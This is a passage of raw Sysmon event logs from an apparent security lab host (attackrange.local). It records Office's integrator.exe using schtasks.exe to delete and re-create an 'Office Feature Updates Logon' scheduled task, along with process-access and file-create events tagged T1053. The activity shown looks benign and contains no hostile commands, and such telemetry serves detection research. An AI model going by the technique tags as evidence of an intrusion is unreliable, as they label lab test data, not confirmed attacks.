14:55:55.813{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EB7B-607E-860B-00000000BB01}3752C:\Windows\system32\schtasks.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000071865Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:55.813{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EB7B-607E-860B-00000000BB01}3752C:\Windows\system32\schtasks.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000071864Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:55.813{A7A01FEF-EB7B-607E-860B-00000000BB01}3752C:\Windows\System32\schtasks.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 10341000x800000000000000071863Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:55.813{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-EB7B-607E-860B-00000000BB01}3752C:\Windows\system32\schtasks.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000071862Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:55.813{A7A01FEF-EB7B-607E-870B-00000000BB01}47684572C:\Windows\system32\conhost.exe{A7A01FEF-EB7B-607E-860B-00000000BB01}3752C:\Windows\system32\schtasks.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000071861Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:55.798{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EB7B-607E-870B-00000000BB01}4768C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000071860Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:55.798{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000071859Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:55.798{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000071858Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:55.798{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000071857Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:55.798{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000071856Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:55.798{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EB7B-607E-860B-00000000BB01}3752C:\Windows\system32\schtasks.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000071855Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:55.798{A7A01FEF-EB7A-607E-7E0B-00000000BB01}51165328C:\Program Files\Microsoft Office\root\integration\integrator.exe{A7A01FEF-EB7B-607E-860B-00000000BB01}3752C:\Windows\system32\schtasks.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Microsoft Office\root\integration\integrator.exe+9a2c1|C:\Program Files\Microsoft Office\root\integration\integrator.exe+9a470|C:\Program Files\Microsoft Office\root\integration\integrator.exe+9acd6|C:\Program Files\Microsoft Office\root\integration\integrator.exe+2e73a8|C:\Program Files\Microsoft Office\root\integration\integrator.exe+2e5a66|C:\Program Files\Microsoft Office\root\integration\integrator.exe+14b46|C:\Program Files\Microsoft Office\root\integration\integrator.exe+1403d|C:\Program Files\Microsoft Office\root\integration\integrator.exe+13f75|C:\Program Files\Microsoft Office\root\integration\integrator.exe+28b75|C:\Program Files\Microsoft Office\root\integration\integrator.exe+340078|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000071854Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:55.802{A7A01FEF-EB7B-607E-860B-00000000BB01}3752C:\Windows\System32\schtasks.exe10.0.14393.0 (rs1_release.160715-1616)Task Scheduler Configuration ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationsctasks.exeschtasks.exe /Create /tn "Microsoft\Office\Office Feature Updates Logon" /XML "C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\Microsoft_Office_Office Feature Updates Logon.xml"C:\Windows\system32\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=EEB7A2162E4DBE32B56BEB84658483AE,SHA256=A9A4FD9C1BB7C5CF8F77F761CAE60F4AC4AFB8DAEEBB46B3AD6983D5E599CDC1,IMPHASH=8AC94113AD25518D369E4EE37BEDAB4F{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\Integration\Integrator.exeintegrator.exe /U /Extension /Msi /License PRIDName= PackageGUID="9AC08E99-230B-47e8-9721-4577B7F124EA" PackageRoot="C:\Program Files\Microsoft Office\root" 10341000x800000000000000071853Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:55.782{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EB7B-607E-840B-00000000BB01}6580C:\Windows\system32\schtasks.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000071852Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:55.782{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EB7B-607E-840B-00000000BB01}6580C:\Windows\system32\schtasks.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000071851Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:55.782{A7A01FEF-EB7B-607E-840B-00000000BB01}6580C:\Windows\System32\schtasks.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 10341000x800000000000000071850Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:55.782{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-EB7B-607E-840B-00000000BB01}6580C:\Windows\system32\schtasks.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000071849Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:55.766{A7A01FEF-EB7B-607E-850B-00000000BB01}31922888C:\Windows\system32\conhost.exe{A7A01FEF-EB7B-607E-840B-00000000BB01}6580C:\Windows\system32\schtasks.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000071848Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:55.766{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EB7B-607E-850B-00000000BB01}3192C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000071847Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:55.766{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000071846Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:55.766{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000071845Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:55.766{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000071844Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:55.766{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000071843Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:55.766{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EB7B-607E-840B-00000000BB01}6580C:\Windows\system32\schtasks.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000071842Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:55.766{A7A01FEF-EB7A-607E-7E0B-00000000BB01}51165328C:\Program Files\Microsoft Office\root\integration\integrator.exe{A7A01FEF-EB7B-607E-840B-00000000BB01}6580C:\Windows\system32\schtasks.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Microsoft Office\root\integration\integrator.exe+9a2c1|C:\Program Files\Microsoft Office\root\integration\integrator.exe+9a470|C:\Program Files\Microsoft Office\root\integration\integrator.exe+9ae91|C:\Program Files\Microsoft Office\root\integration\integrator.exe+2e6cd8|C:\Program Files\Microsoft Office\root\integration\integrator.exe+2e5a66|C:\Program Files\Microsoft Office\root\integration\integrator.exe+14b46|C:\Program Files\Microsoft Office\root\integration\integrator.exe+1403d|C:\Program Files\Microsoft Office\root\integration\integrator.exe+13f75|C:\Program Files\Microsoft Office\root\integration\integrator.exe+28b75|C:\Program Files\Microsoft Office\root\integration\integrator.exe+340078|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000071841Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:55.769{A7A01FEF-EB7B-607E-840B-00000000BB01}6580C:\Windows\System32\schtasks.exe10.0.14393.0 (rs1_release.160715-1616)Task Scheduler Configuration ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationsctasks.exeschtasks.exe /Delete /F /tn "Microsoft\Office\Office Feature Updates Logon"C:\Windows\system32\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=EEB7A2162E4DBE32B56BEB84658483AE,SHA256=A9A4FD9C1BB7C5CF8F77F761CAE60F4AC4AFB8DAEEBB46B3AD6983D5E599CDC1,IMPHASH=8AC94113AD25518D369E4EE37BEDAB4F{A7A01FEF-EB7A-607E-7E0B-00000000BB01}5116C:\Program Files\Microsoft Office\root\Integration\Integrator.exeintegrator.exe /U /Extension /Msi /License PRIDName= PackageGUID="9AC08E99-230B-47e8-9721-4577B7F124EA" PackageRoot="C:\Program Files\Microsoft Office\root" 11241100x800000000000000071840Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT10532021-04-20 14:55:55.751{A7A01FEF-B626-607E-1600-00000000BB01}1540C:\Windows\system32\svchost.exeC:\Windows\System32\Tasks\Microsoft\Office\Office Feature Updates2021-04-20 14:55:55.751 11241100x800000000000000071839Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT10532021-04-20 14:55:55.751{A7A01FEF-B626-607E-1600-00000000BB01}1540C:\Windows\system32\svchost.exeC:\Windows\System32\Tasks\Microsoft\Office2021-04-20 14:55:55.751 10341000x800000000000000071838Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:55.751{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EB7B-607E-820B-00000000BB01}4740C:\Windows\system32\schtasks.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000071837Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:55.751{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EB7B-607E-820B-00000000BB01}4740C:\Windows\system32\schtasks.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000071836Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 